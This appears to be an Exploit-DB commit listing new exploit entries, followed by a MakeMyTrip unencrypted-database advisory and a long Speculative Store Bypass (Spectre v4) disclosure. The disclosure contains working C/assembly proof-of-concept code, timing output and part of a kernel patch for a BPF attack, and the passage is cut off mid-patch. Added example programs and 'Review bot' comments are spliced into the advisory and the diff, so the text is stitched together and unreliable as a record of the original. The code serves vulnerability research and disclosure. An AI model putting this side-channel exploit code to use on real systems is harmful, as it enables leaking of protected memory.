DB: 2018-05-23

20 changes to exploits/shellcodes

Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
Microsoft Edge Chakra JIT - Magic Value Type Confusion
AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass
Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
MakeMyTrip 7.2.4 - Information Disclosure
Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)
Microsoft Windows - 'POP/MOV SS' Privilege Escalation

Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting
Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting
Zechat 1.5 - SQL Injection / Cross-Site Request Forgery

Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery
Private Message PHP Script 2.0 - Persistent Cross-Site Scripting
Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Private Message PHP Script 2.0 - Cross-Site Scripting
Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery

ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting
ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting

Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass
Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities
Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass
Wchat PHP AJAX Chat Script  1.5 - Persistent Cross-Site Scripting
Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities
Wchat PHP AJAX Chat Script  1.5 - Cross-Site Scripting
Nordex N149/4.0-4.5 - SQL Injection
WebSocket Live Chat - Cross-Site Scripting
Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
PaulPrinting CMS Printing 1.0 - SQL Injection
iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery
ERPnext 11 - Cross-Site Scripting
NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting
NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
Feedy RSS News Ticker 2.0 - 'cat' SQL Injection
NewsBee CMS 1.4 - 'download.php' SQL Injection
Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting
This commit is contained in:
Offensive Security 2018-05-23 05:01:45 +00:00
parent 08c35595ed
commit 7bbc323854
21 changed files with 1850 additions and 8 deletions


@@ -0,0 +1,24 @@
# Exploit Title: Android Application MakeMyTrip 7.2.4 - Unencrypted Database Files
# Date: 2018-05-21
# Software Link: MakeMyTrip v7.2.4 Android Application
# Exploit Author: Divya Jain
# Version: 7.2.4 Android App
# CVE: CVE-2018-11242
# Category: Mobileapps
# Tested on: Android v5.1
# 1. Description
# The application's private data directory was found to contain SQLite database files in the
# subdirectories data/com.makemytrip/cache and data/com.makemytrip/databases, which is where the
# application stores its databases. Confidential information is kept in these SQLite databases in
# cleartext and can be read straight out of the files. The reported impact covers confidentiality,
# integrity, and availability.
# 2. Proof-of-Concept
# Exploitation requires local, authenticated access to the filesystem, i.e. a rooted Android
# device; the application's private directories below can then be read.
/data/com.makemytrip/databases/
/data/com.makemytrip/cache/
# Both directories hold unencrypted database files on the device, which leads to sensitive
# information disclosure.
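As an added example (not part of the advisory), the following C program performs the first check a reviewer makes on a database file pulled from the app's private databases directory (the advisory's /data/com.makemytrip/databases/): whether it is a plaintext SQLite 3 file at all. A plaintext SQLite file starts with the 16-byte magic "SQLite format 3\0", whereas a SQLCipher-encrypted database starts with a random 16-byte salt and has no such magic. It then does a bounded strings scan to show a record value stored in cleartext. The sample bytes are constructed inline and are not from the MakeMyTrip application; the field names and token value are invented for illustration.

```c
// Added example (not from the advisory): classify a database file pulled from
// an app's private directory as plaintext SQLite or not, and locate a record
// value stored in cleartext. The sample bytes are constructed here, not taken
// from the MakeMyTrip app.
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define SQLITE_HEADER_LEN 100
static const char SQLITE_MAGIC[16] = "SQLite format 3";   /* 15 chars + NUL */

struct sqlite_header {
    uint32_t page_size;     /* bytes 16-17, big-endian; stored value 1 means 65536 */
    uint32_t text_encoding; /* bytes 56-59, big-endian: 1 UTF-8, 2 UTF-16le, 3 UTF-16be */
};

/* Returns 1 and fills *hdr if buf holds a plaintext SQLite 3 header, else 0.
 * A SQLCipher file fails the magic comparison because its first 16 bytes are
 * the key-derivation salt. */
int sqlite_parse_header(const uint8_t *buf, size_t len, struct sqlite_header *hdr)
{
    if (len < SQLITE_HEADER_LEN || memcmp(buf, SQLITE_MAGIC, sizeof SQLITE_MAGIC) != 0)
        return 0;
    uint32_t ps = ((uint32_t)buf[16] << 8) | buf[17];
    hdr->page_size = (ps == 1) ? 65536u : ps;
    hdr->text_encoding = ((uint32_t)buf[56] << 24) | ((uint32_t)buf[57] << 16) |
                         ((uint32_t)buf[58] << 8) | buf[59];
    return 1;
}

/* Minimal `strings`: find the first printable-ASCII run of at least min_len
 * bytes that contains `needle`. Returns its offset in buf, or -1 if none.
 * buf is raw file content and is not NUL-terminated. */
long find_cleartext_string(const uint8_t *buf, size_t len, size_t min_len, const char *needle)
{
    size_t nlen = strlen(needle);
    size_t start = 0;
    for (size_t i = 0; i <= len; i++) {
        int printable = i < len && isprint(buf[i]);
        if (printable)
            continue;
        size_t run = i - start;          /* run is buf[start .. i) */
        if (run >= min_len && run >= nlen) {
            for (size_t j = start; j + nlen <= i; j++)
                if (memcmp(buf + j, needle, nlen) == 0)
                    return (long)j;
        }
        start = i + 1;
    }
    return -1;
}

/* Constructed sample: a 100-byte header (page size 4096, UTF-8) followed by
 * bytes resembling a table record with an e-mail and a session token. */
size_t build_sample_plain_db(uint8_t *out, size_t cap)
{
    static const char record[] = "user\0alice@example.com\0session_token\0eyJhbGciOi";
    if (cap < SQLITE_HEADER_LEN + sizeof record)
        return 0;
    memset(out, 0, SQLITE_HEADER_LEN);
    memcpy(out, SQLITE_MAGIC, sizeof SQLITE_MAGIC);
    out[16] = 0x10; out[17] = 0x00;          /* page size 4096 */
    out[59] = 1;                              /* text encoding UTF-8 */
    memcpy(out + SQLITE_HEADER_LEN, record, sizeof record);
    return SQLITE_HEADER_LEN + sizeof record;
}

/* Constructed sample of what an encrypted (SQLCipher-style) file looks like:
 * no magic, just non-text bytes where the header would be. */
size_t build_sample_encrypted_db(uint8_t *out, size_t cap)
{
    if (cap < SQLITE_HEADER_LEN)
        return 0;
    for (size_t i = 0; i < SQLITE_HEADER_LEN; i++)
        out[i] = (uint8_t)((0x9e * (i + 1)) ^ 0x5a);   /* arbitrary pattern */
    return SQLITE_HEADER_LEN;
}

int main(void)
{
    uint8_t db[256];
    struct sqlite_header hdr;
    size_t n = build_sample_plain_db(db, sizeof db);
    if (sqlite_parse_header(db, n, &hdr)) {
        long off = find_cleartext_string(db, n, 8, "session_token");
        printf("plaintext SQLite (page %u, encoding %u); 'session_token' at offset %ld\n",
               hdr.page_size, hdr.text_encoding, off);
    }
    n = build_sample_encrypted_db(db, sizeof db);
    printf("encrypted-looking sample parses as SQLite: %d\n", sqlite_parse_header(db, n, &hdr));
    return 0;
}
```

On a real pull (`adb pull` of the databases directory from a rooted device), the same two calls applied to each file give the triage result the advisory describes: a parsed header means the file is readable without any key, and a hit from the strings scan is the concrete cleartext value to cite.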


@@ -0,0 +1,994 @@
/*
======== Intro / Overview ========
After Michael Schwarz made some interesting observations, we started
looking into variants other than the three already-known ones.
I noticed that Intel's Optimization Manual says in
section 2.4.4.5 ("Memory Disambiguation"):

    A load instruction micro-op may depend on a preceding store. Many
    microarchitectures block loads until all preceding store addresses
    are known.
    The memory disambiguator predicts which loads will not depend on
    any previous stores. When the disambiguator predicts that a load
    does not have such a dependency, the load takes its data from the
    L1 data cache.
    Eventually, the prediction is verified. If an actual conflict is
    detected, the load and all succeeding instructions are re-executed.
According to my experiments, this effect can be used to cause
speculative execution to continue far enough to execute a
Spectre-style gadget on a pointer read from a memory slot to which a
store has been speculatively ignored. I have tested this behavior on
the following processors from Intel and AMD:
- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz [Skylake laptop]
- AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G [AMD desktop]
- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz [Haswell desktop]
I haven't yet tested this on any ARM CPU.
Interestingly, only on the Skylake laptop, it seems to work when
interrupts and SMP are disabled while the test is running; on the
other machines, it seems to only work when interrupts are enabled,
maybe because the kernel code causes some noise that garbles some
predictor state or so? Or just because they mess up timing
somewhere...
There were mentions of data speculation on the netdev list, in a
somewhat different context:
https://www.mail-archive.com/netdev@vger.kernel.org/msg212262.html
https://www.mail-archive.com/netdev@vger.kernel.org/msg215369.html
However, I'm not entirely sure about the terminology. Do
"data speculation" and "value speculation" include speculating about
the *source* of data, or do they refer exclusively to directly
speculating about the *value* of data?
======== Demo code (no privilege boundaries crossed) ========
This is some code that purely demonstrates the basic effect and shows
that it is possible to combine it with a Meltdown/Spectre-style
gadget for leaking data into the cache. It does not cross any
privilege boundaries.
----------------------- START -----------------------
// compile with: gcc -o test test.c -Wall -DHIT_THRESHOLD={CYCLES}
// optionally add: -DNO_INTERRUPTS
#include <stdio.h>
#include <sys/io.h>
#include <err.h>
#include <sys/mman.h>
#define pipeline_flush() asm volatile("mov $0, %%eax\n\tcpuid\n\tlfence" : /*out*/ : /*in*/ : "rax","rbx","rcx","rdx","memory")
#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory")
// source of high-latency pointer to the memory slot
unsigned char **flushy_area[1000];
#define flushy (flushy_area+500)
// memory slot on which we want bad memory disambiguation
unsigned char *memory_slot_area[1000];
#define memory_slot (memory_slot_area+500)
// 0123456789abcdef
unsigned char secret_read_area[] = "0000011011101011";
unsigned char public_read_area[] = "################";
unsigned char timey_line_area[0x200000];
// stored in the memory slot first
#define timey_lines (timey_line_area + 0x10000)
unsigned char dummy_char_sink;
int testfun(int idx) {
pipeline_flush();
*flushy = memory_slot;
*memory_slot = secret_read_area;
timey_lines['0' << 12] = 1;
timey_lines['1' << 12] = 1;
pipeline_flush();
clflush(flushy);
clflush(&timey_lines['0' << 12]);
clflush(&timey_lines['1' << 12]);
asm volatile("mfence");
pipeline_flush();
// START OF CRITICAL PATH
unsigned char **memory_slot__slowptr = *flushy;
//pipeline_flush();
// the following store will be speculatively ignored since its address is unknown
*memory_slot__slowptr = public_read_area;
// uncomment the instructions in the next line to break the attack
asm volatile("" /*"mov $0, %%eax\n\tcpuid\n\tlfence"*/ : /*out*/ :
/*in*/ : "rax","rbx","rcx","rdx","memory");
// architectural read from dummy_timey_line, possible microarchitectural read from timey_line
dummy_char_sink = timey_lines[(*memory_slot)[idx] << 12];
// END OF CRITICAL PATH
unsigned int t1, t2;
pipeline_flush();
asm volatile(
"lfence\n\t"
"rdtscp\n\t"
"mov %%eax, %%ebx\n\t"
"mov (%%rdi), %%r11\n\t"
"rdtscp\n\t"
"lfence\n\t"
://out
"=a"(t2),
"=b"(t1)
://in
"D"(timey_lines + 0x1000 * '0')
://clobber
"r11",
"rcx",
"rdx",
"memory"
);
pipeline_flush();
unsigned int delay_0 = t2 - t1;
pipeline_flush();
asm volatile(
"lfence\n\t"
"rdtscp\n\t"
"mov %%eax, %%ebx\n\t"
"mov (%%rdi), %%r11\n\t"
"rdtscp\n\t"
"lfence\n\t"
://out
"=a"(t2),
"=b"(t1)
://in
"D"(timey_lines + 0x1000 * '1')
://clobber
"r11",
"rcx",
"rdx",
"memory"
);
pipeline_flush();
unsigned int delay_1 = t2 - t1;
if (delay_0 < HIT_THRESHOLD && delay_1 > HIT_THRESHOLD) {
pipeline_flush();
return 0;
}
if (delay_0 > HIT_THRESHOLD && delay_1 < HIT_THRESHOLD) {
pipeline_flush();
return 1;
}
pipeline_flush();
return -1;
}
int main(void) {
char out[100000];
char *out_ = out;
#ifdef NO_INTERRUPTS
if (mlockall(MCL_CURRENT|MCL_FUTURE) || iopl(3))
err(1, "iopl(3)");
#endif
for (int idx = 0; idx < 16; idx++) {
#ifdef NO_INTERRUPTS
asm volatile("cli");
#endif
pipeline_flush();
long cycles = 0;
int hits = 0;
char results[33] = {0};
/* if we don't break the loop after some time when it doesn't
work, in NO_INTERRUPTS mode with SMP disabled, the machine will lock
up */
while (hits < 32 && cycles < 1000000) {
pipeline_flush();
int res = testfun(idx);
if (res != -1) {
pipeline_flush();
results[hits] = res + '0';
hits++;
}
cycles++;
pipeline_flush();
}
pipeline_flush();
#ifdef NO_INTERRUPTS
asm volatile("sti");
#endif
out_ += sprintf(out_, "%c: %s in %ld cycles (hitrate: %f%%)\n",
secret_read_area[idx], results, cycles, 100*hits/(double)cycles);
}
printf("%s", out);
pipeline_flush();
}
----------------------- END -----------------------
Results:
In the following, "SMP off" means that I have executed this
command:
# for file in /sys/devices/system/cpu/cpu*/online; do echo 0 > $file; done
For the Intel machines, "turbo off" means that I've executed the
following command:
# echo 1 > /sys/devices/system/cpu/intel_pstate/no_turbo
Skylake laptop, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50
$ ./test
0: 00000000000000000000000000000000 in 61944 cycles (hitrate: 0.051660%)
0: 00000000000000000000000000000000 in 36467 cycles (hitrate: 0.087751%)
0: 00000000000000000000000000000000 in 36788 cycles (hitrate: 0.086985%)
0: 00000000000000000000000000000000 in 36800 cycles (hitrate: 0.086957%)
0: 00000000000000000000000000000000 in 35797 cycles (hitrate: 0.089393%)
1: 11111111111111111111111111111111 in 48923 cycles (hitrate: 0.065409%)
1: 11111111111111111111111111111111 in 44525 cycles (hitrate: 0.071870%)
0: 00000000000000000000000000000000 in 44813 cycles (hitrate: 0.071408%)
1: 11111111111111111111111111111111 in 40625 cycles (hitrate: 0.078769%)
1: 11111111111111111111111111111111 in 40897 cycles (hitrate: 0.078245%)
1: 11111111111111111111111111111111 in 39648 cycles (hitrate: 0.080710%)
0: 00000000000000000000000000000000 in 40737 cycles (hitrate: 0.078553%)
1: 11111111111111111111111111111111 in 37850 cycles (hitrate: 0.084544%)
0: 00000000000000000000000000000000 in 46062 cycles (hitrate: 0.069472%)
1: 11111111111111111111111111111111 in 44929 cycles (hitrate: 0.071223%)
1: 11111111111111111111111111111111 in 37465 cycles (hitrate: 0.085413%)
Skylake laptop, SMP off, interrupts off, turbo off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS
$ sudo ./test
0: 00000000000000000000000000000000 in 34697 cycles (hitrate: 0.092227%)
0: 00000000000000000000000000000000 in 32625 cycles (hitrate: 0.098084%)
0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)
0: 00000000000000000000000000000000 in 34680 cycles (hitrate: 0.092272%)
0: 00000000000000000000000000000000 in 32302 cycles (hitrate: 0.099065%)
1: 11111111111111111111111111111111 in 33240 cycles (hitrate: 0.096270%)
1: 11111111111111111111111111111111 in 33738 cycles (hitrate: 0.094849%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 32531 cycles (hitrate: 0.098368%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 32193 cycles (hitrate: 0.099400%)
1: 11111111111111111111111111111111 in 32167 cycles (hitrate: 0.099481%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
Haswell PC, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50
$ ./test
0: 00000000000000000000000000000000 in 119737 cycles (hitrate: 0.026725%)
0: 00000000000000000000000000000000 in 45340 cycles (hitrate: 0.070578%)
0: 00000000000000000000000000000000 in 39127 cycles (hitrate: 0.081785%)
0: 00000000000000000000000000000000 in 39567 cycles (hitrate: 0.080875%)
0: 00000000000000000000000000000000 in 35164 cycles (hitrate: 0.091002%)
1: 11111111111111111111111111111111 in 33770 cycles (hitrate: 0.094759%)
1: 11111111111111111111111111111111 in 36743 cycles (hitrate: 0.087091%)
0: 00000000000000000000000000000000 in 36749 cycles (hitrate: 0.087077%)
1: 11111111111111111111111111111111 in 35686 cycles (hitrate: 0.089671%)
1: 11111111111111111111111111111111 in 35843 cycles (hitrate: 0.089278%)
1: 11111111111111111111111111111111 in 35826 cycles (hitrate: 0.089321%)
0: 00000000000000000000000000000000 in 35302 cycles (hitrate: 0.090646%)
1: 11111111111111111111111111111111 in 34256 cycles (hitrate: 0.093414%)
0: 00000000000000000000000000000000 in 36604 cycles (hitrate: 0.087422%)
1: 11111111111111111111111111111111 in 36795 cycles (hitrate: 0.086968%)
1: 11111111111111111111111111111111 in 37820 cycles (hitrate: 0.084611%)
Haswell PC, SMP off, interrupts off, turbo off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS
$ sudo ./test
0: 00000000000000000000000000000000 in 32770 cycles (hitrate: 0.097650%)
0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)
0: 00000000000000000000000000000000 in 32783 cycles (hitrate: 0.097612%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 37455 cycles (hitrate: 0.085436%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00000000000000000000000000000000 in 39894 cycles (hitrate: 0.080213%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: 11111111111111111111111111111111 in 33845 cycles (hitrate: 0.094549%)
0: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00000000000000000000000000000000 in 44050 cycles (hitrate: 0.072645%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
AMD desktop, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99
$ ./test
0: 0000000000000000000000000 in 1000000 cycles (hitrate: 0.002500%)
0: 000000000000000000000 in 1000000 cycles (hitrate: 0.002100%)
0: 00000000000000000000000000000000 in 939816 cycles (hitrate: 0.003405%)
0: 00000000000000000000000000000000 in 903838 cycles (hitrate: 0.003540%)
0: 00000000000000000000000000000000 in 360430 cycles (hitrate: 0.008878%)
1: 11111111111111111111111111111111 in 484242 cycles (hitrate: 0.006608%)
1: 11111111111111111111111111111111 in 331271 cycles (hitrate: 0.009660%)
0: 00000000000000000000000000000000 in 388049 cycles (hitrate: 0.008246%)
1: 11111111111111111111111111111111 in 282588 cycles (hitrate: 0.011324%)
1: 11111111111111111111111111111111 in 359558 cycles (hitrate: 0.008900%)
1: 11111111111111111111111111111111 in 359013 cycles (hitrate: 0.008913%)
0: 0000000000000000000000000000000 in 1000000 cycles (hitrate: 0.003100%)
1: 11111111111111111111111111111111 in 501067 cycles (hitrate: 0.006386%)
0: 00000000000000000000000000000000 in 312420 cycles (hitrate: 0.010243%)
1: 11111111111111111111111111111111 in 784663 cycles (hitrate: 0.004078%)
1: 11111111111111111111111111111111 in 954189 cycles (hitrate: 0.003354%)
AMD desktop, SMP off, interrupts off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 -DNO_INTERRUPTS
$ sudo ./test
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
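When reproducing these runs on a kernel newer than the one used here, the outcome also depends on whether the kernel has enabled its mitigation for this issue (Speculative Store Bypass Disable) for the task. The following check is an added example, not part of the original write-up: it queries that state through prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS), an interface Linux added in 4.17 after this disclosure, and decodes the returned bit mask as documented in Documentation/userspace-api/spec_ctrl.rst. It assumes glibc's <sys/prctl.h>; fallback constants are defined for older headers. If the decoded state says the mitigation is active for the task, the demo above should not be able to observe the effect from that task.

```c
// Added example (not part of the disclosure): query the per-task Speculative
// Store Bypass mitigation state via prctl(PR_GET_SPECULATION_CTRL), which
// Linux 4.17 introduced in response to this issue. Bit meanings follow
// Documentation/userspace-api/spec_ctrl.rst; fallback constants below are for
// pre-4.17 headers.
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <sys/prctl.h>

#ifndef PR_GET_SPECULATION_CTRL
#define PR_GET_SPECULATION_CTRL 52
#define PR_SET_SPECULATION_CTRL 53
#endif
#ifndef PR_SPEC_STORE_BYPASS
#define PR_SPEC_STORE_BYPASS 0
#endif
#ifndef PR_SPEC_PRCTL
#define PR_SPEC_NOT_AFFECTED   0
#define PR_SPEC_PRCTL          (1UL << 0)
#define PR_SPEC_ENABLE         (1UL << 1)
#define PR_SPEC_DISABLE        (1UL << 2)
#define PR_SPEC_FORCE_DISABLE  (1UL << 3)
#endif
#ifndef PR_SPEC_DISABLE_NOEXEC
#define PR_SPEC_DISABLE_NOEXEC (1UL << 4)
#endif

enum ssb_state {
    SSB_UNKNOWN,         /* kernel has no speculation-control interface (pre-4.17) */
    SSB_NOT_AFFECTED,    /* all bits zero: CPU not affected by store bypass */
    SSB_SPEC_ENABLED,    /* PR_SPEC_ENABLE: speculation allowed, no mitigation for this task */
    SSB_MITIGATED,       /* PR_SPEC_DISABLE (or _NOEXEC): SSBD active for this task */
    SSB_FORCE_MITIGATED  /* PR_SPEC_FORCE_DISABLE: SSBD active and cannot be undone */
};

/* Decode the value returned by PR_GET_SPECULATION_CTRL; a negative `ret`
 * is -errno (EINVAL when the kernel does not implement the prctl). */
enum ssb_state decode_ssb_state(long ret)
{
    if (ret < 0)
        return SSB_UNKNOWN;
    if (ret & PR_SPEC_FORCE_DISABLE)
        return SSB_FORCE_MITIGATED;
    if (ret & (PR_SPEC_DISABLE | PR_SPEC_DISABLE_NOEXEC))
        return SSB_MITIGATED;
    if (ret & PR_SPEC_ENABLE)
        return SSB_SPEC_ENABLED;
    return SSB_NOT_AFFECTED;
}

/* PR_SPEC_PRCTL set means this task may change its own state with
 * prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS, PR_SPEC_DISABLE, 0, 0). */
int ssb_per_task_control_available(long ret)
{
    return ret >= 0 && (ret & PR_SPEC_PRCTL) != 0;
}

/* Query the calling task. Stores the raw prctl result (or -errno) in *raw
 * when raw is non-NULL and returns the decoded state. */
enum ssb_state query_ssb_state(long *raw)
{
    long ret = prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS, 0, 0, 0);
    if (ret < 0)
        ret = -errno;
    if (raw)
        *raw = ret;
    return decode_ssb_state(ret);
}

static const char *ssb_state_name(enum ssb_state s)
{
    switch (s) {
    case SSB_NOT_AFFECTED:    return "CPU not affected";
    case SSB_SPEC_ENABLED:    return "store bypass speculation enabled (no mitigation for this task)";
    case SSB_MITIGATED:       return "SSBD active for this task";
    case SSB_FORCE_MITIGATED: return "SSBD active and locked for this task";
    default:                  return "kernel has no speculation-control interface";
    }
}

int main(void)
{
    long raw;
    enum ssb_state s = query_ssb_state(&raw);
    if (raw < 0)
        printf("PR_GET_SPECULATION_CTRL failed: %s -> %s\n", strerror((int)-raw), ssb_state_name(s));
    else
        printf("raw 0x%lx: %s%s\n", raw, ssb_state_name(s),
               ssb_per_task_control_available(raw) ? " (per-task control available)" : "");
    return 0;
}
```

The system-wide view is the text in /sys/devices/system/cpu/vulnerabilities/spec_store_bypass; the prctl result is the per-task one, which is what matters for a process like the demo above, since seccomp or a parent may have opted it into the mitigation even when the global mode is "prctl".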
======== assisted BPF PoC ========
This is a PoC that demonstrates that this issue can potentially be
used to attack the Linux kernel's BPF subsystem.
This is *NOT* a full exploit against BPF; this is a PoC that requires
kernel patches that permit the PoC to flush kernel memory from inside
BPF and to measure access times to BPF arrays. It seems probable that
these restrictions could be overcome, but my PoC doesn't do that.
The basic idea here is to cause a speculative type confusion:
1. Store a number N at address A on the stack.
2. Write a pointer P to address A, using a high-latency
expression to compute A.
3. Read a value X from address A, with A specified using a low-latency
expression. Architecturally, X is P; however, microarchitecturally,
X can be N.
4. Use the Spectre/Meltdown gadget to leak the value X points to into
the cache.
The attack benefits from the unique property of eBPF that the engine
performs relatively complicated value tracking, but does not
normally use the resulting information to modify the code in any way
(e.g. by optimizing things away). It is not clear how applicable this
attack would be to e.g. other scripting languages, or whether it is an
issue for non-scripting code.
I have only tested this PoC on an Intel Skylake CPU.
Kernel patch required for the PoC to work (copy attached, so that it
applies cleanly), to be applied to the 4.15.1 stable kernel:
----------------------- START -----------------------
diff --git a/include/linux/bpf.h b/include/linux/bpf.h
index 0b25cf87b6d6..896b4f483fe2 100644
--- a/include/linux/bpf.h
+++ b/include/linux/bpf.h
@@ -591,6 +591,7 @@ extern const struct bpf_func_proto bpf_skb_vlan_push_proto;
extern const struct bpf_func_proto bpf_skb_vlan_pop_proto;
extern const struct bpf_func_proto bpf_get_stackid_proto;
extern const struct bpf_func_proto bpf_sock_map_update_proto;
+extern const struct bpf_func_proto bpf_clflush_mfence_proto;
/* Shared helpers among cBPF and eBPF. */
void bpf_user_rnd_init_once(void);
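Review bot: the new `extern const struct bpf_func_proto bpf_clflush_mfence_proto;` has no helper id next to it, and the only thing that wires it up is a bare `case 4:` in net/core/filter.c later in this patch, so a reader of this header cannot tell which helper number a program must emit to reach it. Add a named constant, or at least a comment on this line stating the id, so the helper is not reachable only through a magic number.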
diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
index 3d24e238221e..379dc888cb81 100644
--- a/kernel/bpf/helpers.c
+++ b/kernel/bpf/helpers.c
@@ -179,3 +179,17 @@ const struct bpf_func_proto bpf_get_current_comm_proto = {
.arg1_type = ARG_PTR_TO_UNINIT_MEM,
.arg2_type = ARG_CONST_SIZE,
};
+
+BPF_CALL_1(bpf_clflush_mfence, void *, target) {
+ asm volatile("mfence\n\tclflush (%0)\n\tmfence"::"r"(target):"memory");
+ return 0;
+}
+
+const struct bpf_func_proto bpf_clflush_mfence_proto = {
+ .func = bpf_clflush_mfence,
+ .ret_type = RET_INTEGER,
+ /* theoretically permits CLFLUSH on invalid addresses,
+ * but the PoC doesn't do that
+ */
+ .arg1_type = ARG_DONTCARE
+};
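Review bot: `.arg1_type = ARG_DONTCARE` means the verifier imposes nothing on the argument and `clflush (%0)` runs on whatever scalar the program supplies; the comment above it admits invalid addresses are possible, and CLFLUSH on an unmapped or non-canonical address faults in kernel context. Since the PoC only ever passes a stack-slot pointer, declare it as `ARG_PTR_TO_MEM` with a second `ARG_CONST_SIZE` argument, the same pattern `bpf_get_current_comm_proto` uses in the context lines above, so the verifier rejects anything else.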
diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
index 5cb783fc8224..2dd9a2a95630 100644
--- a/kernel/bpf/syscall.c
+++ b/kernel/bpf/syscall.c
@@ -605,6 +605,85 @@ static int map_lookup_elem(union bpf_attr *attr)
return err;
}
+static int map_time_flush_loc(union bpf_attr *attr)
+{
+ void __user *ukey = u64_to_user_ptr(attr->key);
+ void __user *uvalue = u64_to_user_ptr(attr->value);
+ int ufd = attr->map_fd;
+ struct bpf_map *map;
+ void *key, *ptr;
+ struct fd f;
+ int err = 0;
+ u64 delay = 0;
+
+ f = fdget(ufd);
+ map = __bpf_map_get(f);
+ if (IS_ERR(map))
+ return PTR_ERR(map);
+
+ if (!(f.file->f_mode & FMODE_CAN_READ)) {
+ err = -EPERM;
+ goto err_put;
+ }
+
+ if (map->map_type != BPF_MAP_TYPE_ARRAY) {
+ err = -EINVAL;
+ goto err_put;
+ }
+
+ if (attr->flags > 0x100000 || attr->flags >= map->value_size) {
+ err = -EINVAL;
+ goto err_put;
+ }
+ asm volatile("lfence");
+
+ key = memdup_user(ukey, map->key_size);
+ if (IS_ERR(key)) {
+ err = PTR_ERR(key);
+ goto err_put;
+ }
+
+ rcu_read_lock();
+ ptr = map->ops->map_lookup_elem(map, key);
+ if (ptr) {
+ unsigned int t1, t2;
+ ptr = (char*)ptr + attr->flags;
+ asm volatile(
+ "xor %%r11, %%r11\n\t"
+ "lfence\n\t"
+ "rdtscp\n\t"
+ "mov %%eax, %%ebx\n\t"
+ "mov (%%rdi), %%r11b\n\t"
+ "rdtscp\n\t"
+ "mfence\n\t"
+ "clflush (%%rdi)\n\t"
+ "mfence\n\t"
+ ://out
+ "=a"(t2),
+ "=b"(t1)
+ ://in
+ "D"(ptr)
+ ://clobber
+ "r11",
+ "rcx",
+ "rdx",
+ "memory"
